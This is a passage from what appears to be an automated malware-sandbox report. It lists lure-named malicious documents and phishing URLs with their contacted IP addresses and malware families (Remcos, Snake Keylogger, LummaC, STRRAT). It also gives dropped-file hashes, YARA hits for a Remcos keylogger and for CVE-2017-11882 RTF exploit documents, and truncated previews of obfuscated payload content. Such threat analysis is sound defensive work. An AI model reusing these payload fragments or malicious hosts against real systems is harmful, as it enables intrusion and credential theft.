                                                                                                      AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                                      • 107.172.130.147
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 192.3.220.20
                                                                                                      REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 172.245.123.6
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 192.3.220.20
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 192.3.220.20
                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                      • 107.172.130.147
                                                                                                      https://perts.logterd.top/Get hashmaliciousUnknownBrowse
                                                                                                      • 172.245.112.202
                                                                                                      CLOUDFLARENETUS.05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      ATT71725.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.25.14
                                                                                                      https://metapolicyreview.com/Get hashmaliciousUnknownBrowse
                                                                                                      • 104.16.79.73
                                                                                                      Payment Notification.msgGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.68.220
                                                                                                      Aisha C. Yetman shared you a document..msgGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.25.14
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.96.3
                                                                                                      https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjsulL2bcqZSGb5TVbFOhW-BzJJtb8_QJJBgbE1zqe78Ie8BMxsNyhIFwdKd0pdA90RMhgTdSzkU9EZ9vbhoKh9hWuvNOpIawTAXoH5R0ak3U5rG_o-sZZz3gEiDRvTxtIDu5LY0qOySZABWrjrj9OfeDXHmC1qe7sBrjM2U90kovZKuuD34ZvXQ_OD2Hq--rkZwnu_VhQVAySwVh2ojndP52NUX9X40zwPfUt6TCc4F2rNspoMzray6vSBsFLXUX7nVDHqqILMYBWJr9fSc6AC0-g4meRNvX0rdEgcGztZ5SXk2Zbb1UlFLMFg&sai=AMfl-YQ851Qqa8i013PHKiB6TgTZ-QzfEpO1vcyiniBLSOaNAv3siIC9L9LV3aRq_nbn81w6wFB7OvNqhOdGvo-t7Q&sig=Cg0ArKJSzNuc_g1R_f21EAE&fbs_aeid=&urlfix=1&adurl=https://t.events.caixabank.com/r/?id=h665ab089,6dc7f7ae,f89fd96&p1=d70r46aqireop.cloudfront.net%23QZ~MamRpYXpAZXZlcnNoZWRzLXN1dGhlcmxhbmQuZXM=Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.25.14
                                                                                                      bfINGx7hvL.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.97.3
                                                                                                      mSLEwIfTGL.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                      • 172.67.74.152
                                                                                                      kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.58.182
                                                                                                      FASTLYUSATT71725.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 151.101.2.137
                                                                                                      https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.5-1/rubyinstaller-devkit-3.3.5-1-x64.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 185.199.110.133
                                                                                                      Aisha C. Yetman shared you a document..msgGet hashmaliciousUnknownBrowse
                                                                                                      • 151.101.66.137
                                                                                                      https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjsulL2bcqZSGb5TVbFOhW-BzJJtb8_QJJBgbE1zqe78Ie8BMxsNyhIFwdKd0pdA90RMhgTdSzkU9EZ9vbhoKh9hWuvNOpIawTAXoH5R0ak3U5rG_o-sZZz3gEiDRvTxtIDu5LY0qOySZABWrjrj9OfeDXHmC1qe7sBrjM2U90kovZKuuD34ZvXQ_OD2Hq--rkZwnu_VhQVAySwVh2ojndP52NUX9X40zwPfUt6TCc4F2rNspoMzray6vSBsFLXUX7nVDHqqILMYBWJr9fSc6AC0-g4meRNvX0rdEgcGztZ5SXk2Zbb1UlFLMFg&sai=AMfl-YQ851Qqa8i013PHKiB6TgTZ-QzfEpO1vcyiniBLSOaNAv3siIC9L9LV3aRq_nbn81w6wFB7OvNqhOdGvo-t7Q&sig=Cg0ArKJSzNuc_g1R_f21EAE&fbs_aeid=&urlfix=1&adurl=https://t.events.caixabank.com/r/?id=h665ab089,6dc7f7ae,f89fd96&p1=d70r46aqireop.cloudfront.net%23QZ~MamRpYXpAZXZlcnNoZWRzLXN1dGhlcmxhbmQuZXM=Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 151.101.130.137
                                                                                                      https://www.vossloh-events.com/EMOS/Login.aspx?ReturnUrl=%2femosGet hashmaliciousUnknownBrowse
                                                                                                      • 151.101.2.132
                                                                                                      PO#518464.jsGet hashmaliciousSTRRATBrowse
                                                                                                      • 199.232.196.209
                                                                                                      PO#518464.jsGet hashmaliciousSTRRATBrowse
                                                                                                      • 199.232.196.209
                                                                                                      Proof Of Payment.jsGet hashmaliciousSTRRATBrowse
                                                                                                      • 199.232.196.209
                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                      • 185.199.110.133
                                                                                                      https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 151.101.193.229
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      05af1f5ca1b87cc9cc9b25185115607dShipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 185.199.108.133
                                                                                                      • 104.21.64.88
                                                                                                      7dcce5b76c8b17472d024758970a406bFACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      E-BILL#226.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                      • 172.67.179.215
                                                                                                      • 104.21.64.88
                                                                                                      No context
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):324
                                                                                                      Entropy (8bit):3.5045906285934727
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:6l6aC55YcIeeDAlTyFwfxNa/WA7DxbN2fBMMm0v:6lxChecpn50/WItN25MMl
                                                                                                      MD5:87F3034465ABE15170FD7C89B3B6E25E
                                                                                                      SHA1:BA803B996696596A734D44CC2B8F16DF9071835C
                                                                                                      SHA-256:D554636DEC058116BE6EE8AC0428545D540723B95E7B2BCC83479EB2C1C5B296
                                                                                                      SHA-512:B1A771D51BA5192912F4F23816B096D4B6B7C5DE81E36AA6996174548A14DDAA30B9177678965679AD11E87CD9D311C1CEC6146A71AB274E5BE6D5D322C23C44
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Preview:....[.2.0.2.4./.0.9./.2.7. .0.6.:.5.1.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):131072
                                                                                                      Entropy (8bit):0.025361166851056896
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:I3DPcU3djHvxggLRSjkm3rRXv//4tfnRujlw//+GtluJ/eRuj:I3DPT4X3tvYg3J/
                                                                                                      MD5:B67A0CD7BAF53E71776D0DE71B2FD003
                                                                                                      SHA1:26AA47FFD54707E6F8D7E08CFA0F5C1FFBBFB86E
                                                                                                      SHA-256:97C991C620C58AB38A883A999293E4F827EFBFB07882DD786177D145D52EB80D
                                                                                                      SHA-512:DEC423C9B465C099F89DDA3E2F3C1AF771DB3002C9410569749A2E24E8017ADAA4D29ACD5EE6325D72AD1359472AC10BEDFA95A13295583D6C5E649E68CAFB0F
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:......M.eFy...z.j.{...D...%K...S,...X.F...Fa.q............................A.....I....$............e...X.F.k..n.>......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4760
                                                                                                      Entropy (8bit):4.834060479684549
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                      Malicious:false
                                                                                                      Preview:@...e...........................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Rich Text Format data, version 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):80960
                                                                                                      Entropy (8bit):2.7611674974122504
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:zqH1sxBKZ3kAdQVCF4tUzQwMXpgHWiEcHTeFK9i8eWkXtcW1:zKC635dQVtizQwMZgH8W6f1
                                                                                                      MD5:BB08F924D8E1BDC601C2FF9B31E10E0F
                                                                                                      SHA1:2BB89B597719AEB1C1E2B2625F6EEA7B3C868C00
                                                                                                      SHA-256:ADE4F2AB855284C27728CE653FF5E2D6155F293A263313C340895CD2A1916692
                                                                                                      SHA-512:1FD7141C8567A6B8154C19598C03C8A06E21882F0393006D8E8C1F6E07A3A2EA84EF3F55938951A75E48276D65ACDFB5D893B49157710DD2B089F74EC5A62634
                                                                                                      Malicious:false
                                                                                                      Yara Hits:
                                                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson[1].doc, Author: ditekSHen
                                                                                                      Preview:{\rtf1..{\*\fKlODFZXCCH1GmNLdvRwqauSlgKKsIidoCA83Ske0PgaExinysjdwdgLJHjYzgZ86xAKoBa0JN8G6dmHRflMEPXJt4oylG31WU480qsGAyuCQEMS5BpHDJD1WwrjlSwu8j7hArO4a7IZi8FzwMCWQlW7Ep9zUf1UyZcApcv7biaWWlDW059GPBDG3czuVJ4O3uqiWWF1Ff}..{\208625193@3.?](.2!-?~)|2?*<?:.72#?`~005=_?1=;?`119%*?.1^=+%)-:.)~9!>~(^@~5[?-<?73_~+.$%;#@@1.?~%8.&^&``../#??@67.!|5?.4-6-3:8?&5'^8_'?(!/?'.|!;&2~`4.%<?_/-.+5..092>||:-*??$<?%&..0'/.%`.@.4?=0?)4.*6,#%6>???.,<9?'..]+_17?/5%3?(?%=8:][|'6.<#.5;:)?55/.#@8)||!?^..:??0.[?>&~0,1%*-5.%/?4$|0-]5_>]9??-<^.]|$[<?.&<`?>%$.(=>'_]3???.,0~.'1?6[*5&82?~^:?@5><>4;?%.%3?7+>4|(`%6$0@|?;+_*9),_=.|,,>(&#<(0]@<|0?>'[*)%(=?;5~%>](*'6/?/?4-!,;??.3=6.62,?5:??`?1_.933!.]*[??+2=|[';?'?[*?*,433?@(:2|[].('3++5#>1^/=2[-[#&4/77<3:;@-'^1@2:/8;9^<.*-?&)>$-`.?'+&-0]?*<.$),+/?274#-!:#[=~?+1?,?%]68$0.?@????>.0?034[^;.~<!.^+,0.?<>.7*)?!%98~?7.%&^-*4)00?=#%./1?)@&@<+-|2$8&.|)7?`(.;[[_~?-)6%1>6[%?%,0?$7?7[<:/?./?>^)?1_3|+.$~27?%&6??].;#.6.<&?_7]9+]#.+?^!.19|6<%?^#>*.#1(.0~,5.~%+(08~;4~$,#>;^'[^.<2.3[[?.]6_~%$
                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):287788
                                                                                                      Entropy (8bit):3.7504621377581446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:B67qps7ACJHiVKcfGDFrAjG/1e5iXS3VgIOn1SMTXAPwNox:uqps7ACIhUFUjG/qii3Vgfn1SMMPVx
                                                                                                      MD5:9AD8FFC121555E095C50E055C94F5C1E
                                                                                                      SHA1:880257375B655F27C6CB156BC295574BBDA06130
                                                                                                      SHA-256:D96A7A5F278ECED0B23141D34A5A8A465D88085D4E0007D201EFB6C1F2DE34B0
                                                                                                      SHA-512:D9C6ABDD4F3239E4099791BE19721500214A38ED4665FF81D97865AFCA18D0E79DE1C0734DC31790A0BF051880C7F7B563AC171EE624CDD1F90B2B44C018D448
                                                                                                      Malicious:false
                                                                                                      Preview:..Z.z.v.l.L.G.T.W.W.t.G.k.L.L.a.L.R.l.i.W.O.I.b.c.s.J.W.H.c.U.z. .=. .".s.t.f.U.A.t.W.J.k.C.K.n.U.L.R.R.A.z.W.i.W.z.h.R.L.x.S.G.N.K.K.".....U.T.h.C.a.b.a.l.a.d.o.B.K.L.i.m.h.z.e.h.z.j.L.i.B.c.G.b.i.G.c.b.L.Z.P.L. .=. .".p.k.U.i.l.c.x.a.K.n.R.o.h.n.K.k.B.L.L.K.W.L.L.U.t.a.A.n.W.n.B.".....o.m.N.B.k.C.m.i.p.Z.n.h.l.m.g.b.d.a.B.A.e.L.j.G.z.Z.v.U.c.K.i. .=. .".W.R.a.k.L.U.p.K.Z.R.K.I.e.c.i.U.l.o.L.b.g.G.U.c.i.H.d.p.b.j.Z.".....C.L.c.p.m.d.x.g.P.c.L.W.P.P.i.K.K.A.o.I.S.j.P.t.L.q.x.L.K.f.l. .=. .".v.L.c.A.t.L.W.W.C.C.j.f.n.p.Z.N.q.K.G.d.R.L.A.z.i.P.A.i.x.W.L.".....q.L.W.U.A.k.N.A.b.G.e.G.b.u.c.u.b.o.f.c.U.e.K.h.L.i.x.e.K.W.b. .=. .".c.b.z.p.U.z.A.z.W.d.v.x.K.s.a.i.U.q.b.k.T.O.W.f.q.G.o.z.k.x.f.".....G.l.G.K.c.m.x.W.a.R.K.B.G.W.L.L.x.b.s.N.k.x.L.B.u.U.Q.c.u.t.b. .=. .".j.t.p.h.m.e.b.P.J.x.I.f.C.P.f.k.Z.A.G.h.C.O.W.x.i.G.c.c.W.x.d.".....s.P.A.o.U.z.l.c.N.P.r.L.W.c.H.f.n.W.z.e.Z.K.U.W.l.i.U.h.b.P.m. .=. .".l.i.c.L.R.c.R.U.x.L.d.W.m.P.k.a.W.p.G.i.L.K.W.L.W.p.a.k.i.b.Q.".....b.W.i.H.W.W.N.G.W.m.k.
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3921492
                                                                                                      Entropy (8bit):3.1095518398201056
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:3Hs1S7ri2/rkty00vHneHwiS4ri2/5Mh600xr:3H/7ri2DktylHneH84ri2RMh6/r
                                                                                                      MD5:5869A5B09249C16416038F8A2830F256
                                                                                                      SHA1:1B0EFDF66C11530863F8ACCE6F6C3E3E0A2FB13E
                                                                                                      SHA-256:C1B5154CB5B39832878FEE32C2F7F6E7771645E7DAC980DA3EEBC0AB12F77A52
                                                                                                      SHA-512:B7C36A9268398CB7C990F1B1A40CF94A8E92AF4A53C5332995F0AAF305087E7119E70D9CE698A53E949B147F3E202862F9335CE5D0AA2DA0E9837C779EF85904
                                                                                                      Malicious:false
                                                                                                      Preview:....l...............I............N...E.. EMF....T.;.............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................'......."...........!...............................................'......."...........!...............................................'......."...........!...............................................'......."...........!...............................................'......."...........!...............................................'...............................T...L..........................A...A............L.......................L..."...........!...............................................'......."...........!...............................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:Rich Text Format data, version 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):80960
                                                                                                      Entropy (8bit):2.7611674974122504
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:zqH1sxBKZ3kAdQVCF4tUzQwMXpgHWiEcHTeFK9i8eWkXtcW1:zKC635dQVtizQwMZgH8W6f1
                                                                                                      MD5:BB08F924D8E1BDC601C2FF9B31E10E0F
                                                                                                      SHA1:2BB89B597719AEB1C1E2B2625F6EEA7B3C868C00
                                                                                                      SHA-256:ADE4F2AB855284C27728CE653FF5E2D6155F293A263313C340895CD2A1916692
                                                                                                      SHA-512:1FD7141C8567A6B8154C19598C03C8A06E21882F0393006D8E8C1F6E07A3A2EA84EF3F55938951A75E48276D65ACDFB5D893B49157710DD2B089F74EC5A62634
                                                                                                      Malicious:false
                                                                                                      Yara Hits:
                                                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C899BC08.doc, Author: ditekSHen
                                                                                                      Preview:{\rtf1..{\*\fKlODFZXCCH1GmNLdvRwqauSlgKKsIidoCA83Ske0PgaExinysjdwdgLJHjYzgZ86xAKoBa0JN8G6dmHRflMEPXJt4oylG31WU480qsGAyuCQEMS5BpHDJD1WwrjlSwu8j7hArO4a7IZi8FzwMCWQlW7Ep9zUf1UyZcApcv7biaWWlDW059GPBDG3czuVJ4O3uqiWWF1Ff}..{\208625193@3.?](.2!-?~)|2?*<?:.72#?`~005=_?1=;?`119%*?.1^=+%)-:.)~9!>~(^@~5[?-<?73_~+.$%;#@@1.?~%8.&^&``../#??@67.!|5?.4-6-3:8?&5'^8_'?(!/?'.|!;&2~`4.%<?_/-.+5..092>||:-*??$<?%&..0'/.%`.@.4?=0?)4.*6,#%6>???.,<9?'..]+_17?/5%3?(?%=8:][|'6.<#.5;:)?55/.#@8)||!?^..:??0.[?>&~0,1%*-5.%/?4$|0-]5_>]9??-<^.]|$[<?.&<`?>%$.(=>'_]3???.,0~.'1?6[*5&82?~^:?@5><>4;?%.%3?7+>4|(`%6$0@|?;+_*9),_=.|,,>(&#<(0]@<|0?>'[*)%(=?;5~%>](*'6/?/?4-!,;??.3=6.62,?5:??`?1_.933!.]*[??+2=|[';?'?[*?*,433?@(:2|[].('3++5#>1^/=2[-[#&4/77<3:;@-'^1@2:/8;9^<.*-?&)>$-`.?'+&-0]?*<.$),+/?274#-!:#[=~?+1?,?%]68$0.?@????>.0?034[^;.~<!.^+,0.?<>.7*)?!%98~?7.%&^-*4)00?=#%./1?)@&@<+-|2$8&.|)7?`(.;[[_~?-)6%1>6[%?%,0?$7?7[<:/?./?>^)?1_3|+.$~27?%&6??].;#.6.<&?_7]9+]#.+?^!.19|6<%?^#>*.#1(.0~,5.~%+(08~;4~$,#>;^'[^.<2.3[[?.]6_~%$
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3237596
                                                                                                      Entropy (8bit):2.941908215680894
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:JNpuoh+quNeNpVAZSedri2/OZGIuKO9l8J07uGOE68J0YHmDodYJhuRJiTeJa8Kd:xHniS4ri2/CGuIl00Rh600YHY3R
                                                                                                      MD5:886E5A977F3F446457EDB5D24FFD19A4
                                                                                                      SHA1:4FA4E9045B1064F6FBE7171E8C2FEA86E650B338
                                                                                                      SHA-256:A28F8FB1CFFFEE037FCF67A7858B4CE3155FCD18C268BBC4EE73BDE44C8BC478
                                                                                                      SHA-512:B3B0815B234496BB7AFCDFD57750BEC9672886BD9B96E189F4662A100667EAF956158B36BF22370EAB86AD3E785FBD32A03A2565E83BF0C36F9DB8127E1DB840
                                                                                                      Malicious:false
                                                                                                      Preview:....l............................T...F.. EMF.....f1.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):47140
                                                                                                      Entropy (8bit):3.156204322603732
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:xdwvcwdV2rhfzK1QhEck9yKxIt3qad5i5KuzNxjDo:xdDoy6It75mKyA
                                                                                                      MD5:E74E525CE8067F6EE5388CB457C97485
                                                                                                      SHA1:1EB3031BA1F6BB51572663BBA551D065B90E4901
                                                                                                      SHA-256:3D576943B3A8619CAED01B561E9F639C4826602942552FA33D9A1037ED55321D
                                                                                                      SHA-512:7669A3F76FE8D9C191F0E1406E0A201E140561848F35A3495BFC0481EB5E32D7776B821D0C5799EB7336ED32D197DE168AD47D2DA544A6DF87309554F861C735
                                                                                                      Malicious:false
                                                                                                      Preview:....l...........;...............~@..xW.. EMF....$...[.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n.......................................................................av./............0.*.....(.*.....0.*............. .......(.*.....(.*.....0.*.....G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6.................*.................................................dv......%...........%...........%.......................T...............!...q........i.@...@....Z.......L...............<.......p...0.8.6.2.5.1.9.3.@.3...?.].(...2.!...2...2...2...2...2...2...2...2...\...2.......-..."...!...(...2...!...............T...T...".......A...q........i.@...@"...Z.......L...............<...
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3919640
                                                                                                      Entropy (8bit):3.109586010517866
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:EHRgSGri2/oVyL00KH2sHliS4ri2/32h6001q:EHTGri2AVyLIH2sHR4ri2/2h6bq
                                                                                                      MD5:AD5B063741C521880C04A4739CD29A12
                                                                                                      SHA1:6634874A30DB4384B0EBF882261762FBF9B3212F
                                                                                                      SHA-256:257E06D8A62128C65F47C0185407AAB2144DC47B387AE986728DD3CEDEF33DF2
                                                                                                      SHA-512:CB6D041B561897B5107810C69E001977B9F168B4DFC734846794D9AB97B71BBD158025B690BF1F4ABB50E00EA7E23B4A57401EED30195F8852C47BFBA79EBE9B
                                                                                                      Malicious:false
                                                                                                      Preview:....l............................H...@.. EMF......;.R.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!...............................................................................T...L.......................UU.A&..A............L.......................L..."...........!......................................................."...........!...............................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):14336
                                                                                                      Entropy (8bit):5.5670134814546595
                                                                                                      Encrypted:false
